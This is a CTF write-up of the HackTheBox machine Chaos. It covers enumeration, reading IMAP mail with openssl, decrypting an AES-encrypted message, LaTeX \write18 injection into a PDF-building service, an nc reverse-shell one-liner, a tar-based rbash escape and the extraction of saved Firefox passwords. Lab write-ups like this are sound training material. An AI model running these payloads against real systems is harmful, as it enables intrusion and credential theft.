HackTheBox - Chaos

Summary

Chaos, a Linux box created by HackTheBox user felamos, was an overall simple medium-difficulty box. It revolved around credential reuse and involved only a little exploitation. It taught me how to use openssl to connect to a mail server and read mail without any mail client. It also taught me a little about working with LaTeX. Root on this box was pretty simple: you just had to find and extract the password from Firefox's saved passwords.

Enumeration

nmap Scan

$ nmap -sC -sV 10.10.10.120

Results:

# Nmap 7.70 scan initiated Fri Mar  1 12:22:35 2019 as: nmap -sC -sV 10.10.10.120
Nmap scan report for chaos.htb (10.10.10.120)
Host is up (0.15s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.34 ((Ubuntu))
|_http-server-header: Apache/2.4.34 (Ubuntu)
|_http-title: Chaos
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: PIPELINING TOP SASL RESP-CODES AUTH-RESP-CODE UIDL STLS CAPA
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after: 2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
143/tcp open imap Dovecot imapd (Ubuntu)
|_imap-capabilities: LOGIN-REFERRALS LOGINDISABLEDA0001 more have STARTTLS post-login listed IDLE capabilities Pre-login ID IMAP4rev1 OK SASL-IR LITERAL+ ENABLE
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after: 2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
144/tcp filtered news
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
|_imap-capabilities: LOGIN-REFERRALS more have post-login listed capabilities IDLE OK Pre-login ENABLE IMAP4rev1 AUTH=PLAINA0001 SASL-IR LITERAL+ ID
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after: 2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after: 2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
5100/tcp filtered admd
9618/tcp filtered condor
10000/tcp open http MiniServ 1.890 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 1 12:23:46 2019 -- 1 IP address (1 host up) scanned in 71.36 seconds

nmap finds 80/tcp, 110/tcp, 143/tcp, 993/tcp, 995/tcp and, my oh my, 10000/tcp (Webmin) open. Let's start with port 80.

Opening the page we see the site's landing page.

Let's add chaos.htb to /etc/hosts:

10.10.10.120 chaos.htb

Adding that and visiting the website by hostname, we see nothing interesting.

We ran gobuster against http://chaos.htb, but it found nothing useful. We then tried it against the bare IP address.

Here we got lucky: the URL 10.10.10.120/wp/ was found. Browsing through it, we found a password-protected page (a single password prompt, not a login form). All we had to do was find this password.

After some guessing, the password turns out to be human.

Behind it we get credentials for the webmail: ayush:jiujitsu.

Web-mail

Let's verify the webmail credentials over IMAPS, since IMAP is the more likely backend for a webmail front end. openssl s_client works much like nc for connecting to TLS-wrapped services:

openssl s_client -crlf -connect 10.10.10.120:993

We are able to log in to the mail server with the credentials we found.
Let's LIST the mailboxes.

The only mail is in Drafts.

Let's SELECT Drafts and FETCH that mail. Every IMAP command is prefixed with a tag (here simply a), and the tagged OK at the end tells us which command completed:

a FETCH 1 BODY[]
* 1 FETCH (BODY[] {2532}
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="=_00b34a28b9033c43ed09c0950f4176e1"
Date: Sun, 28 Oct 2018 17:46:38 +0530
From: ayush <ayush@localhost>
To: undisclosed-recipients:;
Subject: service
Message-ID: <7203426a8678788517ce8d28103461bd@webmail.chaos.htb>
X-Sender: ayush@localhost
User-Agent: Roundcube Webmail/1.3.8

--=_00b34a28b9033c43ed09c0950f4176e1
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=US-ASCII;
format=flowed

Hii, sahay
Check the enmsg.txt
You are the password XD.
Also attached the script which i used to encrypt.
Thanks,
Ayush

--=_00b34a28b9033c43ed09c0950f4176e1
Content-Transfer-Encoding: base64
Content-Type: application/octet-stream;
name=enim_msg.txt
Content-Disposition: attachment;
filename=enim_msg.txt;
size=272

MDAwMDAwMDAwMDAwMDIzNK7uqnoZitizcEs4hVpDg8z18LmJXjnkr2tXhw/AldQmd/g53L6pgva9
RdPkJ3GSW57onvseOe5ai95/M4APq+3mLp4GQ5YTuRTaGsHtrMs7rNgzwfiVor7zNryPn1Jgbn8M
7Y2mM6I+lH0zQb6Xt/JkhOZGWQzH4llEbyHvvlIjfu+MW5XrOI6QAeXGYTTinYSutsOhPilLnk1e
6Hq7AUnTxcMsqqLdqEL5+/px3ZVZccuPUvuSmXHGE023358ud9XKokbNQG3LOQuRFkpE/LS10yge
+l6ON4g1fpYizywI3+h9l5Iwpj/UVb0BcVgojtlyz5gIv12tAHf7kpZ6R08=
--=_00b34a28b9033c43ed09c0950f4176e1
Content-Transfer-Encoding: base64
Content-Type: text/x-python; charset=us-ascii;
name=en.py
Content-Disposition: attachment;
filename=en.py;
size=804
[base64 body of en.py omitted]
--=_00b34a28b9033c43ed09c0950f4176e1--
)
a OK Fetch completed (0.002 + 0.000 + 0.001 secs).

We get two attachments, and the message tells sahay "You are the password", so the password is sahay.

Looking at en.py, we see it encrypts with AES in CBC mode, using the SHA-256 digest of the password as the key (32 bytes, so AES-256). The output file starts with the original file size as 16 zero-padded ASCII digits, then the 16-byte IV, then the ciphertext; the last chunk is padded with spaces (not PKCS#7) up to a multiple of 16 bytes.

import os
from Crypto import Random
from Crypto.Cipher import AES
from Crypto.Hash import SHA256


def encrypt(key, filename):
    chunksize = 64*1024
    outputFile = "en" + filename
    # original file size as 16 zero-padded ASCII digits; this header is
    # written in the clear before the IV
    filesize = str(os.path.getsize(filename)).zfill(16)
    IV = Random.new().read(16)

    encryptor = AES.new(key, AES.MODE_CBC, IV)

    with open(filename, 'rb') as infile:
        with open(outputFile, 'wb') as outfile:
            outfile.write(filesize.encode('utf-8'))
            outfile.write(IV)

            while True:
                chunk = infile.read(chunksize)

                if len(chunk) == 0:
                    break
                elif len(chunk) % 16 != 0:
                    # pad the last chunk with spaces to a block boundary
                    chunk += b' ' * (16 - (len(chunk) % 16))

                outfile.write(encryptor.encrypt(chunk))


def getKey(password):
    # the AES key is simply the raw SHA-256 digest of the password
    hasher = SHA256.new(password.encode('utf-8'))
    return hasher.digest()

We write the matching decrypt routine to recover the message:

from Crypto.Cipher import AES
from Crypto.Hash import SHA256

chunksize = 64*1024

password = "sahay"
key = SHA256.new(password.encode('utf-8')).digest()

msg = b""
# enim_msg.txt is the base64-decoded attachment; open it in binary mode
with open('enim_msg.txt', 'rb') as f:
    f.read(16)  # 16-byte filesize header, not needed to decrypt
    iv = f.read(16)
    cipher = AES.new(key, AES.MODE_CBC, iv)
    while True:
        chunk = f.read(chunksize)
        if not chunk:
            break
        msg += cipher.decrypt(chunk)

print(msg)  # the plaintext is itself base64 text (plus trailing space padding)

Running the decrypt script gives us a base64-encoded blob; decoding it, the message reads:

Hii Sahay

Please check our new service which create pdf

p.s - As you told me to encrypt important msg, i did :)

http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3

Thanks,
Ayush
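To tie the mail step together, here is the whole thing as one script. This is an added example, not code from the writeup or from felamos: it fetches the draft over IMAPS with Python's imaplib (an alternative to driving openssl s_client by hand), cuts the message out of a session captured with openssl s_client by honouring the IMAP literal length, extracts the MIME attachments, and sanity-checks the en.py container before decrypting. It assumes pycryptodome for the AES step, a Drafts mailbox and message number 1 as in the post; the sample FETCH response is constructed from the post's output, with a placeholder en.py body because the original was elided.

```python
"""Added example, not code from the writeup or from the box author.

Three steps the post's screenshots skip: fetch the draft over IMAPS, pull the
attachments out of the MIME body, and check the container en.py writes (16 ASCII
digits of original size, 16-byte IV, AES-CBC ciphertext padded with spaces).
The FETCH reply below is constructed to mirror the post: the enim_msg.txt base64
is the real attachment; the en.py body is a placeholder (the original was elided).
"""
import base64
import email
import hashlib
import imaplib
import re
from email import policy

BOUNDARY = b"=_00b34a28b9033c43ed09c0950f4176e1"
ENIM_MSG_B64 = (
    b"MDAwMDAwMDAwMDAwMDIzNK7uqnoZitizcEs4hVpDg8z18LmJXjnkr2tXhw/AldQmd/g53L6pgva9\r\n"
    b"RdPkJ3GSW57onvseOe5ai95/M4APq+3mLp4GQ5YTuRTaGsHtrMs7rNgzwfiVor7zNryPn1Jgbn8M\r\n"
    b"7Y2mM6I+lH0zQb6Xt/JkhOZGWQzH4llEbyHvvlIjfu+MW5XrOI6QAeXGYTTinYSutsOhPilLnk1e\r\n"
    b"6Hq7AUnTxcMsqqLdqEL5+/px3ZVZccuPUvuSmXHGE023358ud9XKokbNQG3LOQuRFkpE/LS10yge\r\n"
    b"+l6ON4g1fpYizywI3+h9l5Iwpj/UVb0BcVgojtlyz5gIv12tAHf7kpZ6R08="
)

def fetch_draft(host, user, password, mailbox="Drafts"):
    """LOGIN, SELECT, FETCH over IMAPS with the stdlib; needs network, so unused offline."""
    with imaplib.IMAP4_SSL(host, 993) as conn:
        conn.login(user, password)
        conn.select(mailbox, readonly=True)
        status, data = conn.fetch("1", "(BODY.PEEK[])")  # PEEK: do not set \Seen
        if status != "OK":
            raise RuntimeError(f"FETCH failed: {data!r}")
        return data[0][1]  # data[0] is (b'1 (BODY[] {n}', <raw RFC 822 bytes>)

def extract_literal(session):
    """Cut the message out of a session captured with openssl s_client.

    The server sends it as an IMAP literal, `{n}` CRLF then exactly n octets; use n
    rather than scanning for the closing ')', which can legitimately appear in a body.
    """
    m = re.search(rb"\{(\d+)\}\r?\n", session)
    if m is None:
        raise ValueError("no IMAP literal in session")
    n = int(m.group(1))
    data = session[m.end():m.end() + n]
    if len(data) != n:
        raise ValueError(f"literal truncated: want {n} bytes, got {len(data)}")
    return data

def attachments(raw_message):
    """Map attachment filename -> decoded bytes (base64 transfer encoding undone)."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    return {p.get_filename(): p.get_payload(decode=True)
            for p in msg.iter_attachments() if p.get_filename()}

def parse_container(blob):
    """Split en.py's output into (size, iv, ciphertext), refusing malformed input."""
    if len(blob) < 32:
        raise ValueError("too short for the 16-byte size field plus 16-byte IV")
    header, iv, ct = blob[:16], blob[16:32], blob[32:]
    if not header.isdigit():
        raise ValueError(f"size field is not ASCII digits: {header!r}")
    size = int(header)
    padded = -(-size // 16) * 16  # en.py space-pads the last chunk to a block boundary
    if len(ct) != padded:
        raise ValueError(f"{len(ct)} ciphertext bytes, expected {padded} for size {size}")
    return size, iv, ct

def derive_key(password):
    """Same as en.py's getKey: the raw SHA-256 digest of the password is the AES key."""
    return hashlib.sha256(password.encode("utf-8")).digest()

def decrypt(blob, password):
    """AES-256-CBC decrypt, then drop the space padding using the recorded size."""
    from Crypto.Cipher import AES  # pycryptodome, assumed installed (en.py needs it too)
    size, iv, ct = parse_container(blob)
    return AES.new(derive_key(password), AES.MODE_CBC, iv).decrypt(ct)[:size]

def constructed_fetch_response():
    """The FETCH reply as openssl s_client prints it, rebuilt from the post (constructed)."""
    body = b"\r\n".join([
        b"MIME-Version: 1.0",
        b"Content-Type: multipart/mixed;", b'\tboundary="' + BOUNDARY + b'"',
        b"From: ayush <ayush@localhost>", b"Subject: service", b"",
        b"--" + BOUNDARY, b"Content-Type: text/plain; charset=US-ASCII", b"",
        b"Hii, sahay", b"Check the enmsg.txt", b"You are the password XD.", b"",
        b"--" + BOUNDARY, b"Content-Transfer-Encoding: base64",
        b"Content-Type: application/octet-stream; name=enim_msg.txt",
        b"Content-Disposition: attachment;", b"\tfilename=enim_msg.txt;", b"\tsize=272", b"",
        ENIM_MSG_B64,
        b"--" + BOUNDARY, b"Content-Transfer-Encoding: base64",
        b"Content-Type: text/x-python; name=en.py",
        b"Content-Disposition: attachment; filename=en.py", b"",
        base64.b64encode(b"# placeholder: the real en.py body was elided from the post\n"),
        b"--" + BOUNDARY + b"--", b"",
    ])
    return (b"* 1 FETCH (BODY[] {%d}\r\n" % len(body) + body
            + b")\r\na OK Fetch completed (0.002 + 0.000 + 0.001 secs).\r\n")

FETCH_RESPONSE = constructed_fetch_response()

if __name__ == "__main__":
    att = attachments(extract_literal(FETCH_RESPONSE))
    size, iv, ct = parse_container(att["enim_msg.txt"])
    print(f"attachments {sorted(att)}: {size} plaintext bytes, {len(ct)} ciphertext bytes")
    print(base64.b64decode(decrypt(att["enim_msg.txt"], "sahay")).decode())  # file is base64 text
```

Against a live box you would call fetch_draft("10.10.10.120", "ayush", "jiujitsu") instead of using the constructed response; the rest of the pipeline is unchanged. The container check is worth keeping: the 16-digit size field and the space padding are what tell you the blob really came from en.py, and truncating to the recorded size is cleaner than stripping trailing spaces, which would also eat any genuine trailing whitespace in the plaintext.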

Low-Privilege Shell

Visiting that URL we get a page that builds a PDF from submitted text. Creating a test PDF and inspecting it, we can tell the page uses pdfTeX as its compiler. TeX has several primitives that can be abused when the compiler runs with shell escape enabled: \immediate\write18{...} executes a shell command, and \openin/\read let the document pull a file's contents into the PDF. I used the following payload, which runs nc to spawn a reverse shell; the trailing \openin/\read loop reads test.txt back into the document so that anything written there shows up in the generated PDF.

\immediate\write18{rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.12 9000 >/tmp/f|base64 > test.txt}\newread\file\openin\file=test.txt\loop\unless\ifeof\file\read\file to\fileline\text{\fileline}\repeat\closein\file

One caveat: \write18 only runs arbitrary commands when pdfTeX is invoked with -shell-escape (shell_escape = t in texmf.cnf). In the default restricted mode (shell_escape = p) only whitelisted programs run and pdfTeX just logs that it refused the command, so a harmless probe such as \immediate\write18{id > test.txt} followed by the same read loop is a quick way to confirm the setting before sending anything noisy.

Listening on that port, we catch the reverse shell:

nc -nlvp 9000
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::9000
Ncat: Listening on 0.0.0.0:9000
Ncat: Connection from 10.10.10.120.
Ncat: Connection from 10.10.10.120:45438.
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

Privilege Escalation

Now let's see if we can su to ayush with the password jiujitsu we obtained earlier. Bingo, we are ayush, but the shell is rbash and only dir, ping and tar are available.
tar can be used to break out of rbash, as listed on GTFOBins:

tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

Once that shell spawns, fix the PATH with export PATH=/bin:/usr/bin:$PATH, and we can read user.txt.

Moving to Root.

We also notice a .mozilla folder in ayush's home directory. Downloading it and inspecting the profile, we find a saved login for Webmin (port 10000). Let's decrypt it with Firefox Decrypt; since it is ayush's profile, the master password is likely jiujitsu again, and it is:

Master Password for profile /home/ayush/.mozilla/firefox/bzo7sjt1.default: jiujitsu


Website: https://chaos.htb:10000
Username: 'root'
Password: 'Thiv8wrej~'

That gives us the root password. With it we can su to root and retrieve root.txt.

And we completed chaos with this.

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/chaos/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.